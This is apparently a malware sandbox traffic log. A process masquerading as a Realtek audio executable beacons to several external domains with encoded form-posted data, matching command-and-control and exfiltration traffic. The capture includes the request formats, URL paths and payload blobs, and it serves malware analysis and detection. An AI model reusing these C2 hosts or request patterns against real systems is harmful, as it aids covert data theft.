                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:16.969784021 CET534INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmQ5YjhjNTgtYTRhNy00YzA1LWE4N2UtMzdhNzA4ZDEyMDYzIiwicGFnZV90aW1lIjoxNzM0MDM2OTE2LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.11.2049735199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:19.492327929 CET386OUTGET /f9au/?Hsa=KVXAK1dJ22EyzD&Sb=QRtPaBdQsqikqwtJ+Gac0NMmk/tHNWofn17hwciKQcyaSPo61+Z774QFVZQUbpc3NkgC7R9n74G00WikgwdAmD1VZwNHYhXmg3kBj5ds5wl7WitTMr5RZVw= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:19.623517990 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:18 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1470
                                                                                        x-request-id: 68df032f-a507-4631-84d7-0a9c926e9327
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ALI/9Olt9m1ZkzOMfzcy2LVj2hE0Gom0NMDOpcXQUuHK2TrWhpQp6HsbX4cM0ArCWMAwc2huG66tmwGKQrg3Tw==
                                                                                        set-cookie: parking_session=68df032f-a507-4631-84d7-0a9c926e9327; expires=Thu, 12 Dec 2024 21:10:19 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 4c 49 2f 39 4f 6c 74 39 6d 31 5a 6b 7a 4f 4d 66 7a 63 79 32 4c 56 6a 32 68 45 30 47 6f 6d 30 4e 4d 44 4f 70 63 58 51 55 75 48 4b 32 54 72 57 68 70 51 70 36 48 73 62 58 34 63 4d 30 41 72 43 57 4d 41 77 63 32 68 75 47 36 36 74 6d 77 47 4b 51 72 67 33 54 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ALI/9Olt9m1ZkzOMfzcy2LVj2hE0Gom0NMDOpcXQUuHK2TrWhpQp6HsbX4cM0ArCWMAwc2huG66tmwGKQrg3Tw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:55:19.623548985 CET870INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjhkZjAzMmYtYTUwNy00NjMxLTg0ZDctMGE5YzkyNmU5MzI3IiwicGFnZV90aW1lIjoxNzM0MDM2OTE5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.11.2049736209.74.79.40807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:24.982733965 CET656OUTPOST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 37 5a 62 57 44 4c 33 4d 71 62 44 75 51 4b 69 6e 70 33 5a 6f 36 6d 32 6d 47 4c 43 34 7a 54 46 47 77 67 52 63 4f 63 57 63 73 69 62 72 35 2b 63 7a 79 65 66 63 46 50 72 79 77 7a 78 32 4b 6f 44 5a 4d 76 61 6b 4a 6b 32 65 6c 76 38 45 42 59 51 45 37 4c 4b 52 41 39 58 4c 75 74 2f 71 4a 66 33 47 72 67 71 53 62 4d 78 4f 5a 37 68 61 45 6b 56 4b 4c 39 76 4d 52 51 7a 52 6e 46 46 51 63 68 57 69 62 7a 6c 59 4a 48 71 72 31 55 5a 46 52 78 47 51 33 57 68 4c 34 77 31 6d 58 65 70 31 49 43 63 45 46 54 37 76 56 4e 45 4b 6e 43 75 46 38 6f 30 45 6c 62 34 68 4c 30 77 45 78 62 76 42 59 58 47 69 47 77 3d 3d
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDuQKinp3Zo6m2mGLC4zTFGwgRcOcWcsibr5+czyefcFPrywzx2KoDZMvakJk2elv8EBYQE7LKRA9XLut/qJf3GrgqSbMxOZ7haEkVKL9vMRQzRnFFQchWibzlYJHqr1UZFRxGQ3WhL4w1mXep1ICcEFT7vVNEKnCuF8o0Elb4hL0wExbvBYXGiGw==
                                                                                        Dec 12, 2024 21:55:25.175986052 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:25 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.11.2049737209.74.79.40807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:27.691076994 CET676OUTPOST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 37 5a 62 57 44 4c 33 4d 71 62 44 75 66 4a 36 6e 76 51 46 6f 39 47 32 6c 44 4c 43 34 34 7a 46 43 77 67 64 63 4f 64 53 31 76 52 2f 72 36 65 4d 7a 6a 72 7a 63 41 50 72 79 34 54 78 2f 58 59 44 48 4d 75 6d 57 4a 68 4f 65 6c 76 34 45 42 64 38 45 36 38 6d 65 42 74 58 4a 76 64 2f 6f 4e 66 33 47 72 67 71 53 62 4d 56 30 5a 37 35 61 45 77 52 4b 49 65 33 50 59 77 7a 4f 67 46 46 51 57 42 57 6d 62 7a 6b 69 4a 44 71 46 31 58 78 46 52 30 36 51 32 45 46 4d 74 67 30 74 54 65 6f 31 59 6e 70 71 42 69 37 39 52 75 63 49 68 33 53 59 35 2b 35 65 34 70 4d 46 49 6e 73 32 31 72 57 70 61 56 48 35 62 34 33 37 43 64 70 56 58 75 63 34 59 43 50 70 37 46 45 75 56 51 6f 3d
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDufJ6nvQFo9G2lDLC44zFCwgdcOdS1vR/r6eMzjrzcAPry4Tx/XYDHMumWJhOelv4EBd8E68meBtXJvd/oNf3GrgqSbMV0Z75aEwRKIe3PYwzOgFFQWBWmbzkiJDqF1XxFR06Q2EFMtg0tTeo1YnpqBi79RucIh3SY5+5e4pMFIns21rWpaVH5b437CdpVXuc4YCPp7FEuVQo=
                                                                                        Dec 12, 2024 21:55:27.871979952 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:27 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.11.2049738209.74.79.40807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:30.394112110 CET1289OUTPOST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 37 5a 62 57 44 4c 33 4d 71 62 44 75 66 4a 36 6e 76 51 46 6f 39 47 32 6c 44 4c 43 34 34 7a 46 43 77 67 64 63 4f 64 53 31 76 52 33 72 36 73 30 7a 79 38 6e 63 48 50 72 79 79 7a 78 79 58 59 43 62 4d 76 4f 53 4a 68 4c 6a 6c 71 6b 45 43 37 6f 45 71 5a 53 65 59 39 58 4a 6b 39 2f 70 4a 66 33 70 72 67 36 65 62 4d 46 30 5a 37 35 61 45 32 39 4b 66 64 76 50 65 77 7a 52 6e 46 46 45 63 68 57 4f 62 31 4d 59 4a 44 6e 77 70 33 52 46 57 55 4b 51 30 33 68 4d 77 51 30 76 57 65 6f 62 59 6e 74 70 42 69 6e 62 52 72 49 69 68 78 32 59 37 70 38 65 68 36 45 78 57 30 77 49 6f 49 4f 51 56 30 4c 6d 59 5a 7a 48 52 50 74 50 49 49 59 2b 52 6a 7a 7a 69 51 59 73 41 57 57 30 4a 41 4d 62 4f 46 65 46 4f 79 4e 4b 43 41 4d 59 48 4a 6f 73 50 62 61 53 77 65 55 77 74 71 58 57 30 38 62 2f 4a 6e 39 77 2b 35 38 7a 59 71 50 63 47 4d 77 4e 31 36 51 4c 36 79 77 6b 50 64 66 36 6e 31 6d 65 70 69 35 74 45 62 43 72 65 75 47 73 6a 67 53 43 49 39 6e 35 39 65 32 51 49 67 6f 74 73 6d 5a 6b 36 45 51 35 4d 6e 78 53 61 57 65 5a 38 4b 4b 44 73 56 57 [TRUNCATED]
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDufJ6nvQFo9G2lDLC44zFCwgdcOdS1vR3r6s0zy8ncHPryyzxyXYCbMvOSJhLjlqkEC7oEqZSeY9XJk9/pJf3prg6ebMF0Z75aE29KfdvPewzRnFFEchWOb1MYJDnwp3RFWUKQ03hMwQ0vWeobYntpBinbRrIihx2Y7p8eh6ExW0wIoIOQV0LmYZzHRPtPIIY+RjzziQYsAWW0JAMbOFeFOyNKCAMYHJosPbaSweUwtqXW08b/Jn9w+58zYqPcGMwN16QL6ywkPdf6n1mepi5tEbCreuGsjgSCI9n59e2QIgotsmZk6EQ5MnxSaWeZ8KKDsVW6saZHA6SJuayN/YEj/DwsFsFe425bjNWu0julgC7GFirGsTRBn1sHn2wRP4CWWTFffAf7XYcQfpTmGN/hJG8akG4wXdm/Dd+EjoSLu89aKeL4+qkTA5nR1zmx9hjBnFQi3s4LodnUaoI1pLrDaRPwlwORc/ldz82IrPU6peu1KHd8GrnpP6OKFwNyrTpc62Li1wB6faDWdfGJEgfiskbc29Fna3cSPgC5jq9bOMwlEbUR15zFXzrBuUqfwmB8nA8Zla3A+jSot2eWtz9QrMmcMaJjuMP4P9UAt50R59xrx7BJp5AcRvJQG6PwK+J9pITcOKVq+8bwsL86da5/6JE4ovV/asClqNOlnveiEQUUKPpvWl0xpwzoGg+49+/LqFHWcyN62atdu5FC3CcB+18iUi3HryPpD2k4kh9ZGavHAYLJlmSeyl3X0x2fEr5pDKc8FFyMKyNrCdoBRw7DhUW4DOmU4j0pRQynEtdp6JZdoRTt
                                                                                        Dec 12, 2024 21:55:30.394176006 CET6536OUTData Raw: 45 4f 59 64 41 53 30 32 45 72 75 35 64 55 42 4d 4f 47 47 43 38 74 51 68 33 56 50 51 58 62 6f 43 4e 74 73 30 31 46 79 63 64 30 39 51 69 31 4b 36 75 34 5a 67 62 7a 47 38 77 72 6c 69 4c 36 45 44 61 31 69 41 66 39 44 54 30 48 72 44 56 49 37 68 35 77
                                                                                        Data Ascii: EOYdAS02Eru5dUBMOGGC8tQh3VPQXboCNts01Fycd09Qi1K6u4ZgbzG8wrliL6EDa1iAf9DT0HrDVI7h5wYJ2T6b/0Wg1+Sh5TRy/qyytagyVXk3nwAkEFBuCpS23oEcX5qyI2lakIfUo1CL/SqpLRAVliIX2LoAdV9ruN3vz0hAkonnjvNptda5OdEhS4cvC9GRHY6F4di177U4S4rpV49FHO3Par3wI1qIW7bkqUTF7ZuoQAy
                                                                                        Dec 12, 2024 21:55:30.577013969 CET533INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:30 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.11.2049739209.74.79.40807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:33.086163044 CET386OUTGET /b4eq/?Sb=2bz2A+/Foq3BfYH3nkBAyBiQIN6vyGxA4CsyDuG2uzWi6t8+qfWmEOSu1g9JXJzNDc3HOGTjteURa686/52bGvnFkZWUI+XcrzebZPERH7tGcGhGffP7RzY=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:55:33.256392002 CET548INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:55:33 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.11.2049740199.59.243.227807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:55:38.574903011 CET629OUTPOST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 62 78 5a 57 68 2f 46 48 56 76 4a 76 61 38 53 74 38 5a 68 79 43 6c 54 61 41 6d 72 39 53 4b 6a 76 71 75 4a 43 32 45 65 74 42 61 5a 36 68 32 2b 52 67 51 41 43 56 2f 62 74 43 44 42 42 79 45 4a 72 46 54 52 73 43 48 79 35 43 32 46 4a 4a 59 52 6b 5a 5a 67 52 6e 48 68 76 32 43 43 7a 75 4d 36 4d 51 51 56 51 35 42 4a 44 41 67 49 73 79 4a 52 36 49 77 35 36 4b 71 68 72 38 4e 66 57 4a 30 49 6c 66 76 39 67 71 4f 38 72 65 65 48 42 33 55 37 49 43 75 6f 4c 66 42 56 5a 55 52 63 51 32 44 75 6b 75 6f 33 75 35 50 4d 55 59 55 38 33 41 58 31 71 33 55 65 31 35 46 77 6f 55 35 62 32 41 45 35 66 6b 41 3d 3d
                                                                                        Data Ascii: Sb=bxZWh/FHVvJva8St8ZhyClTaAmr9SKjvquJC2EetBaZ6h2+RgQACV/btCDBByEJrFTRsCHy5C2FJJYRkZZgRnHhv2CCzuM6MQQVQ5BJDAgIsyJR6Iw56Kqhr8NfWJ0Ilfv9gqO8reeHB3U7ICuoLfBVZURcQ2Dukuo3u5PMUYU83AX1q3Ue15FwoU5b2AE5fkA==
                                                                                        Dec 12, 2024 21:55:38.706279993 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:55:37 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 6431c321-283b-4fae-937f-c5744729e43c
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=6431c321-283b-4fae-937f-c5744729e43c; expires=Thu, 12 Dec 2024 21:10:38 GMT; path=/
                                                                                        connection: close
